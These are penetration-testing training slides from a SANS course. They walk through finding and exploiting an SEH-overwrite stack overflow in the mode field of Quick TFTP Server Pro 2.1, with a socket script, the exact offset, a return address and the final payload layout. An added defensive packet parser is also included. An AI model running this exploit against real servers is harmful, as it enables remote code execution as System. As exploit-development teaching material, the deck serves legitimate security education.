
Custom Penetration Testing
Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims

Advanced Penetration Testing - 2009 SANS

Objectives

- Penetration Testing
- Precompiled Tools
- Targeting
- TFTP
- Advanced Concepts
- Testing a TFTP Server for Bugs
- Discovering the Bug
- Exploiting the TFTP Server

What is Penetration Testing?

- Process of testing a target environment for weaknesses
- More thorough than vulnerability scanning alone
- Validates findings by exploiting flaws
- Allows you to think like an attacker
- Various levels of interaction/depth

Types of Penetration Testing

- Black-Box Penetration Testing
  - No access to source code
  - No access provided to OS, architecture, etc.
  - More like an outsider attack scenario
  - More time consuming
- Crystal-Box Penetration Testing
  - Tester given source code, system & network architecture and/or privileged system access
  - More thorough than black-box testing
  - Cost effective

Precompiled Tools

Pros
- Can quickly be used
- Customer support
- Broad user community
- Often allow custom scripts or modules

Cons
- Limited in scope
- Only discover and test known vulnerabilities
- Skilled attackers are not relying solely on them
- Precompiled tools offer a sense of complacency
- Do not perform code coverage or do deep fuzzing

Targeting

General Steps
1. Determine Target Application and Operating System
2. Obtain a Copy of the Application
3. Analyze RFC and Communications Protocols
4. Discover and Record a Crash Condition
5. Analyze Crash Condition for Exploitation Opportunities

1) Determine Target Application and Operating System

- What application/service are you analyzing?
  - What OS is it available for?
  - Which one(s) are you interested in?
- What services does the application start up?
  - There may be several
  - Scanning may help
  - Analyze documentation and code if possible
- Are the services proprietary or standards-based?
  - Proprietary often offer a lot of new opportunities

2) Obtain a Copy of the Application

- Create a lab environment and install the application
  - Use the OS you are targeting
  - Utilize Virtual Machines
  - Create snapshots prior to installation
  - Install monitoring tools
- Attempt to obtain the source code
  - Code analysis is often more complex than behavioral analysis, but valuable

3) Analyze RFC and Communications Protocols

- Is documentation available?
  - Programmers should follow RFCs
  - Search the RFC for potential options and fields that may contain opportunities to cause a fault
  - Understand each aspect of the protocols used by the application and the related behavior
- Is architectural documentation available?

4) Discover and Record a Crash Condition

- Are you properly monitoring?
  - Sniffers to record packets sent to the application
    - Wireshark/Tshark, tcpdump, etc.
    - Packets can be recorded and replayed
  - Debuggers to record application behavior while receiving/handling data
    - OllyDbg, Immunity Debugger, WinDbg
  - OS monitoring tools to monitor health
    - ProcMon, RegMon, FileMon, RegShot, etc.
- The condition must be repeatable

5) Analyze Crash Condition for Exploitation Opportunities

- What is happening during the crash?
  - Analyze the status of each register
  - Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting As
- Is the Return Pointer or SEH chain being overwritten?
  - Analyze the stack segment and monitor ESP/EBP
- Are heap pointers being overwritten?
  - Analyze dynamic memory allocations and behavior
- There's way more to analyze, but this is a start!

Targeting (2)

- Our goal is to discover and exploit a Windows program vulnerability!
  - The techniques we'll cover are applicable to any target or service
- We're targeting a TFTP service
  - Must understand how the protocol works
  - Developers should follow RFCs
  - We can leverage the RFC as well
- Could use fuzzing to automate bug discovery

Our TFTP Target

- Quick TFTP Server Pro Version 2.1
  - Vulnerable to a stack-based buffer overflow
  - Can exploit by overwriting the Structured Exception Handling (SEH) chain
  - Allows for DoS or code execution as System
- TFTP Server published by TallSoft
- Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security

TFTP

Trivial File Transfer Protocol (TFTP)
- Simple protocol for transferring files over a network
- Clear-text protocol using UDP port 69
- Used for transferring files by network devices, VOIP phones and other client-server programs

TFTP Behavior

- Connection request is combined with either a read or write request
- Blocks of data are sent in a fixed 512 byte size
  - Each block must be acknowledged for error control
- A block less than 512 bytes indicates the end of the stream

TFTP Behavior (2)

The first two bytes of a TFTP header indicate the request type and format:

    \x00\x01  indicates a read request
    \x00\x02  indicates a write request
    \x00\x03  indicates the data block
    \x00\x04  is an acknowledgement
    \x00\x05  indicates an error
    \x00\x06  is an optional acknowledgement

TFTP Behavior (3)

Read and Write request format:

    Request Type   \x00\x01 for read | \x00\x02 for write
    File Name
    Null byte      \x00
    Mode           Binary, ASCII or Mail
    Null byte      \x00

Example:

    Request Type   Read      \x00\x01
    File Name      file1.txt
    Null           0
    Mode           Octet
    Null           0
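The request layout above is what a server has to parse, and the two variable-length fields (file name and mode) are the ones a parser must bound before copying anywhere. The following is an added example, not code from the slides or from Quick TFTP Server: a builder for RRQ/WRQ packets in exactly the slide's layout, plus a strict parser that enforces the opcode table, the two NUL terminators, the RFC 1350 mode names, and a length limit on each field. The limits MAX_FILENAME and MAX_MODE are assumptions of this example (the RFC fixes no maximum, which is precisely why an implementation has to choose one); the function names are also hypothetical.

```python
import struct

# Opcodes as listed on the slide (RFC 1350; OACK comes from RFC 2347).
RRQ, WRQ, DATA, ACK, ERROR, OACK = 1, 2, 3, 4, 5, 6
OPCODE_NAMES = {
    RRQ: "read request", WRQ: "write request", DATA: "data block",
    ACK: "acknowledgement", ERROR: "error", OACK: "option acknowledgement",
}

# Transfer modes RFC 1350 permits, compared case-insensitively ("octet" is the slide's "Binary").
VALID_MODES = {"netascii", "octet", "mail"}

# Assumed limits (not from the slides or the RFC): a bound the parser enforces
# before the field is ever copied into a fixed-size buffer.
MAX_FILENAME = 255
MAX_MODE = 8


def build_request(opcode, filename, mode="octet"):
    """Encode an RRQ/WRQ as on the slide: 2-byte opcode | filename | NUL | mode | NUL."""
    if opcode not in (RRQ, WRQ):
        raise ValueError("only RRQ/WRQ carry a filename and mode")
    return (struct.pack("!H", opcode) + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def parse_request(datagram):
    """Strict parser: returns (opcode, filename, mode) or raises ValueError.

    For non-RRQ/WRQ opcodes the filename and mode are returned as None.
    Each check is a bound the vulnerable server described later did not apply.
    """
    if len(datagram) < 2:
        raise ValueError("datagram shorter than opcode")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODE_NAMES:
        raise ValueError("unknown opcode %d" % opcode)
    if opcode not in (RRQ, WRQ):
        return opcode, None, None
    parts = datagram[2:].split(b"\x00")
    # A well-formed request is filename, mode, and an empty trailer after the final NUL.
    if len(parts) != 3 or parts[2] != b"":
        raise ValueError("request is not two NUL-terminated strings")
    filename, mode = parts[0], parts[1]
    if not filename or len(filename) > MAX_FILENAME:
        raise ValueError("filename empty or longer than %d bytes" % MAX_FILENAME)
    if len(mode) > MAX_MODE:
        raise ValueError("mode field is %d bytes, limit is %d" % (len(mode), MAX_MODE))
    mode_text = mode.decode("ascii", errors="replace").lower()
    if mode_text not in VALID_MODES:
        raise ValueError("unknown transfer mode %r" % mode_text)
    return opcode, filename.decode("ascii", errors="replace"), mode_text


def classify(datagram):
    """Detection-style wrapper: 'ok: <type>' for a valid packet, else the rejection reason."""
    try:
        opcode, _filename, _mode = parse_request(datagram)
    except ValueError as exc:
        return "rejected: " + str(exc)
    return "ok: %s" % OPCODE_NAMES[opcode]


# Constructed samples: the slide's example read request, and a request whose mode
# field is 1000 'A' bytes (the shape the walk-through later sends at the server).
SAMPLE_GOOD = build_request(RRQ, "file1.txt", "octet")
SAMPLE_OVERSIZED_MODE = b"\x00\x01" + b"blah" + b"\x00" + b"A" * 1000 + b"\x00"

if __name__ == "__main__":
    for name, pkt in (("good", SAMPLE_GOOD), ("oversized mode", SAMPLE_OVERSIZED_MODE)):
        print(name, "->", classify(pkt))
```

The same length checks, applied on the server side before the mode string is copied into a stack buffer, are what would have turned the crash discussed in the walk-through into a rejected packet.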

Hacking Quick TFTP Server

Quick TFTP Server Version 2.1
- Install tftpserver_setup.exe onto a Windows XP Virtual Machine
- Use the TFTP information just covered to help with the investigation
- Attempt to crash the TFTP server while running in a debugger
- Create a custom script to start the testing
- Validate findings
- Attempt code execution

Tools We Need

- Programming/Scripting Language
  - Python, Perl, Ruby, C
- Debugger and Disassembler
  - OllyDbg, Immunity Debugger, IDA Pro
- Shellcode
  - Metasploit, Milw0rm, Custom
- An open mind!
  - Knowledge of OS controls, opcodes, tricks

Python

- Object-oriented, high-level programming language
- Very intuitive
- Very modular
- No manual compilation
- Plays well with other languages
  - C, C++, Jython, IronPython (.NET)
- Good debugging

Tool: OllyDbg

- Software debugger for Windows
- Author: Oleh Yuschuk
- Shareware!
- Binary code analysis
- Register contents, procedures, API calls, patching, memory searching and more!

Hacking TFTP Hint #1

- Consider the format of TFTP requests for your script
  - We covered the order a few slides ago
- Read & Write requests are often the easiest to attack as they have variable fields
  - They start with \x00\x01 & \x00\x02
- The header format must be correct to trigger a valid response
- Command line scripting is not always the best option
  - You may want to write a script

Hacking TFTP Hint #2

- Where could a buffer overflow condition exist?
  - Try the request type field, file name and/or the mode
  - Don't forget the nulls to terminate!
- Make sure you're watching the right thread in OllyDbg
  - Processes have multiple threads on Windows

Hacking TFTP Hint #3

The easiest way is to use Python or Perl to open a socket and send your script:

    import socket
    import sys

    target = "IP ADDRESS"   # Enter the right IP here
    port = 69               # Port for TFTP
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # TFTP is UDP
    cmd = b"A" * 10         # Enter the number of A's to send
    data = b"\x00\x01" + cmd   # Modify this line to format your packet
    s.sendto(data, (target, port))

Quick TFTP Walk-Through

- Start Quick TFTP Server with Olly
- Ignore entry point messages
- Press F9 once loaded
- Click OK on the demo pop-up

Quick TFTP Walk-Through (2)

- This may be possible via command line, but we need a script!
- Don't forget the formatting of TFTP read and write requests:

    Request Type   Read      \x00\x01
    File Name      file1.txt
    Null           0
    Mode           Octet
    Null           0

- The overflow is in the mode section!

Quick TFTP Walk-Through (3)

- Write a Python script that connects to the TFTP server with 1000 As
- No crash in Olly

Quick TFTP Walk-Through (4)

- 1060 As: EIP is 41414141
- Success!
- Olly has paused

Quick TFTP Walk-Through (5)

- What are we overwriting?
  - We overwrote the SEH chain!
- Let's do some math to see where the overflow is occurring

Quick TFTP Walk-Through (6)

- Subtracting 41 As should take us to the SEH handler
- Let's give it a try by setting:

    cmd = b"A" * 1023 + b"\xde\xc0\xad\xde"

- We control EIP at 1023 bytes!

Quick TFTP Walk-Through (7)

- We now need to find a valid pop/pop/ret instruction
  - Use the findjmp tool and experiment
  - 0x77ec9cac is one I chose from kernel32.dll for XP SP1
- Remember that you must compensate for SafeSEH if hacking XP SP2/SP3
- Also remember that not every pop/pop/ret address will work. You gotta dig

Quick TFTP Walk-Through (8)

Finalizing our script:

    # sc holds the shellcode bytes (Metasploit, Milw0rm or custom); it is not shown on the slide
    cmd = (b"A" * 1019
           + b"\xeb\x06\x90\x90" + b"\xac\x9c\xec\x77"   # our jmp and pointer
           + b"\x90" * 4 + sc)                           # our NOPs and shellcode
    data = b"\x00\x01" + b"blah" + b"\x00" + cmd + b"\x00"

Advanced Concepts

Depending on the OS version, a number of controls have been added:

- SafeSEH: Protects SEH pointers against overwrites
- ASLR: Randomizes locations of libraries and memory segments
- DEP: Prevents code execution on the stack and heap
- Security Cookies: Pushes unique values onto the stack and heap during allocations which are checked upon exit or free

Every byte in memory is a potential full or partial opcode
- As long as the segment is executable

More Information

- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server, by David Litchfield: http://www.nextgenss.com/papers/defeating-w2k3-stackprotection.pdf
- Preventing the Exploitation of SEH Overwrites, by Skape (Matt Miller): http://www.uninformed.org/?v=5&a=2&t=pdf
- SEH Overwrites Simplified v1.01, by Aelphaeis Mangarae: http://www.milw0rm.com/papers/187
- Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass, by Alexander Anisimov: http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
- Reliable Windows Heap Exploits, by Matt Conover & Oded Horovitz: http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
- Third Generation Exploitation, by Halvar Flake: www.blackhat.com/presentations/win-usa02/halvarflake-winsec02.ppt
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server, by David Litchfield: http://www.ngssoftware.com/papers/defeating-w2k3-stackprotection.pdf
- Heap Feng Shui in JavaScript, by Alexander Sotirov: http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07sotirov-apr19.pdf
- Understanding Windows Shellcode, by Skape: http://www.hick.org/code/skape/papers/win32shellcode.pdf

End

Questions?

SANS SEC709: Developing Exploits for Penetration Testers and Security Researchers
stephen@deadlisting.com